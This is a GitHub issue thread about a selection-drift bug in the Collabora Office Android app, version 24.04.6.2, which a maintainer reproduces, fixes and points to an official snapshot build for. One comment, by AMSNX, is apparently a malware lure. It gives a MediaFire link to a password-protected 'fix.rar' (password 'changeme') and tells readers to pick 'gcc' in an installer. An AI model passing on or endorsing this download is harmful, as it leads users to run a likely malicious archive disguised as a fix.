### ISSUE TITLE
Selection runs away to bottom left after new Collabora office android update (24.04.6.2)

### ISSUE THREAD

**Issue by evilwizarddog** [CollaboraOnline/online#9906]
When selecting multiple cells in a spreadsheet the selection drifts suddenly to the bottom left. It is very difficult to make accurate selections.

This is new since the most recent update (24.04.6.2).

Samsung Galaxy A23
Android 14

**Comment by AMSNX** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by siccovansas** [comment]
@evilwizarddog is this related to https://github.com/CollaboraOnline/online/issues/9291?

**Comment by evilwizarddog** [comment]
No it's a different issue.

After trying other spreadsheets I've realised it's an issue with spreadsheets with many narrow cells. See video below:

https://github.com/user-attachments/assets/56f64fa8-2b0e-4270-8603-cd185f9be9ff

In this video I'm just dragging the selection area to the right, and the spreadsheet automatically drifts to the bottom left.

I can make selections but I have to be quick! Otherwise the view drifts like this if I hold the selection for longer.

**Comment by Minion3665** [comment]
I've tested this and - yep - that shouldn't happen 😅 

I'll work on a fix for this, hopefully I'll be able to do this by the next Android release. I'll keep you posted. Thanks very much for reporting this!

**Comment by Minion3665** [comment]
Here's the document I constructed to test this:
[thincells.ods](https://github.com/user-attachments/files/16846722/thincells.ods)

**Comment by Minion3665** [comment]
Thanks very much for your report! I've fixed this, and expect it to be in the next version. As it's just been merged it's not in any snapshots yet but I'll let you know when there's one to test!

**Comment by evilwizarddog** [comment]
Awesome! Thanks for your hard work

**Comment by Minion3665** [comment]
Hello @evilwizarddog! The latest snapshot, which you can get [from our website here](https://www.collaboraoffice.com/downloads/Collabora-Office-Android-Snapshot/?C=M;O=D): (the exact correct link depends on your device, but it's probably [the arm64 build unless you know differently](https://www.collaboraoffice.com/downloads/Collabora-Office-Android-Snapshot/collabora-office-mobile-24.04-snapshot-arm64-v8a-2024-09-15.apk)), should have the fix to the runaway selections you were facing :)

Please feel free to test it and confirm that it solves the issue, thanks!
